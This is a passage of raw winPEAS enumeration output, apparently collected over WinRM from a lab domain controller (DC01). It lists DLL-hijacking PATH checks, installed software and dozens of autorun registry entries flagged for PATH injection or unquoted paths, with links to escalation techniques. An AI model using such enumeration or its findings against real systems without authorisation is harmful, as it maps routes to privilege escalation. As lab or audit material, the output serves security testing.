WINRM       172.16.55.128   5985   DC01             È Check if you can modify the registry of a service https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#services-registry-modify-permissions                                                                            
WINRM       172.16.55.128   5985   DC01                 [-] Looks like you cannot change the registry of any service...                                                                                         
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking write permissions in PATH folders (DLL Hijacking)                                                                                     
WINRM       172.16.55.128   5985   DC01             È Check for DLL Hijacking in PATH folders https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dll-hijacking     
WINRM       172.16.55.128   5985   DC01                 C:\Windows\system32
WINRM       172.16.55.128   5985   DC01                 C:\Windows
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\Wbem
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\WindowsPowerShell\v1.0\
WINRM       172.16.55.128   5985   DC01                 C:\Windows\System32\OpenSSH\
WINRM       172.16.55.128   5985   DC01                 C:\Program Files (x86)\Microsoft SQL Server\160\Tools\Binn\                                                                                             
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\160\Tools\Binn\                                                                                                   
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\                                                                                   
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server\160\DTS\Binn\                                                                                                     
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Applications Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Current Active Window Application
WINRM       172.16.55.128   5985   DC01               [X] Exception: Object reference not set to an instance of an object.                                                                                      
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Installed Applications --Via Program Files/Uninstall registry--                                                                                
WINRM       172.16.55.128   5985   DC01             È Check if you can modify installed software https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications   
WINRM       172.16.55.128   5985   DC01                 C:\Program Files (x86)\Microsoft Visual Studio\Installer                                                                                                
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Common Files
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\desktop.ini
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Internet Explorer
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft SQL Server Management Studio 21                                                                                              
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft Visual Studio 10.0
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Microsoft.NET
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\ModifiableWindowsApps
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\PackageManagement
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Uninstall Information
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\VMware
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Defender
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Defender Advanced Threat Protection                                                                                            
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Mail
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Media Player
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows NT
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Photo Viewer
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\Windows Sidebar
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\WindowsApps
WINRM       172.16.55.128   5985   DC01                 C:\Program Files\WindowsPowerShell
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             ÉÍÍÍÍÍÍÍÍÍÍ¹ Autorun Applications
WINRM       172.16.55.128   5985   DC01             È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html                                                                                           
WINRM       172.16.55.128   5985   DC01             Error getting autoruns from WMIC: System.Management.ManagementException: Access denied                                                                      
WINRM       172.16.55.128   5985   DC01                at System.Management.ThreadDispatch.Start()
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementScope.Initialize()
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Initialize()                                                                                               
WINRM       172.16.55.128   5985   DC01                at System.Management.ManagementObjectSearcher.Get()                                                                                                      
WINRM       172.16.55.128   5985   DC01                at winPEAS.Info.ApplicationInfo.AutoRuns.GetAutoRunsWMIC()                                                                                               
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run                                                                                             
WINRM       172.16.55.128   5985   DC01                 Key: SecurityHealth
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\SecurityHealthSystray.exe
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Run                                                                                             
WINRM       172.16.55.128   5985   DC01                 Key: VMware User Process
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files\VMware\VMware Tools
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr (Unquoted and Space detected) - C:\
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders                                                                          
WINRM       172.16.55.128   5985   DC01                 Key: Common Startup
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup                                                                                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders                                                                     
WINRM       172.16.55.128   5985   DC01                 Key: Common Startup
WINRM       172.16.55.128   5985   DC01                 Folder: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup                                                                                    
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon                                                                                     
WINRM       172.16.55.128   5985   DC01                 Key: Userinit
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\system32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\system32\userinit.exe,
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon                                                                                     
WINRM       172.16.55.128   5985   DC01                 Key: Shell
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: explorer.exe
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot                                                                                                 
WINRM       172.16.55.128   5985   DC01                 Key: AlternateShell
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: cmd.exe
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Font Drivers                                                                                 
WINRM       172.16.55.128   5985   DC01                 Key: Adobe Type Manager
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: atmfd.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Font Drivers                                                                     
WINRM       172.16.55.128   5985   DC01                 Key: Adobe Type Manager
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: atmfd.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: aux
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: midi
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: midimapper
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: midimap.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: mixer
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: msacm.imaadpcm
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: imaadp32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: msacm.l3acm
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\System32
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\System32\l3codeca.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msadpcm
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msadp32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msg711
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msg711.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msgsm610
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msgsm32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.i420
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.iyuv
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.mrle
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msrle32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.msvc
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msvidc32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.uyvy
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yuy2
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvu9
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: tsbyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvyu
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: wave
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                                    
WINRM       172.16.55.128   5985   DC01                 Key: wavemapper
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msacm32.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: aux
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: midi
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: midimapper
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: midimap.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: mixer
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: msacm.imaadpcm
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: imaadp32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: msacm.l3acm
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Windows\SysWOW64
WINRM       172.16.55.128   5985   DC01                 File: C:\Windows\SysWOW64\l3codeca.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msadpcm
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msadp32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msg711
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msg711.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: msacm.msgsm610
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msgsm32.acm
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.cvid
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: iccvid.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.i420
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.iyuv
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: iyuv_32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.mrle
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msrle32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.msvc
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msvidc32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.uyvy
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yuy2
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvu9
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: tsbyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: vidc.yvyu
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msyuv.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: wave
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wdmaud.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32                                                                        
WINRM       172.16.55.128   5985   DC01                 Key: wavemapper
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: msacm32.drv
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\Software\Classes\htmlfile\shell\open\command                                                                                              
WINRM       172.16.55.128   5985   DC01                 Folder: C:\Program Files\Internet Explorer
WINRM       172.16.55.128   5985   DC01                 File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected) - C:\
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: *kernel32
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: kernel32.dll
WINRM       172.16.55.128   5985   DC01                =================================================================================================                                                        
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01             
WINRM       172.16.55.128   5985   DC01                 RegPath: HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls                                                                                
WINRM       172.16.55.128   5985   DC01                 Key: _wow64cpu
WINRM       172.16.55.128   5985   DC01                 Folder: None (PATH Injection)
WINRM       172.16.55.128   5985   DC01                 File: wow64cpu.dll
